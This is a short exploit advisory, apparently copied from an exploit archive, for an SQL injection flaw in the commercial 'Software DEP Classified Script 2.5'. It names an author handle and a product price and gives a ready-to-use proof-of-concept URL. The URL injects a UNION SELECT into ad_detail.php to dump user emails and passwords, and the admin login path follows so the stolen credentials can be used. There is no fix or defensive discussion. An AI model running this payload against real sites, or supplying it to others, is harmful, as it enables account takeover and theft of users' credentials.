15 lines
No EOL
494 B
Text
15 lines
No EOL
494 B
Text
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
Software DEP Classified Script 2.5 SQL Injection Vulnerability
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
Author: h0rd
|
|
Contact: h0rd[at]null.net
|
|
homepage: http://h0rd.net
|
|
download: http://www.softwaredep.com/classified-script.html
|
|
Price: $199
|
|
|
|
PoC exploit:
|
|
http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user--
|
|
|
|
login page:
|
|
http://[host]/[script]/admin/ |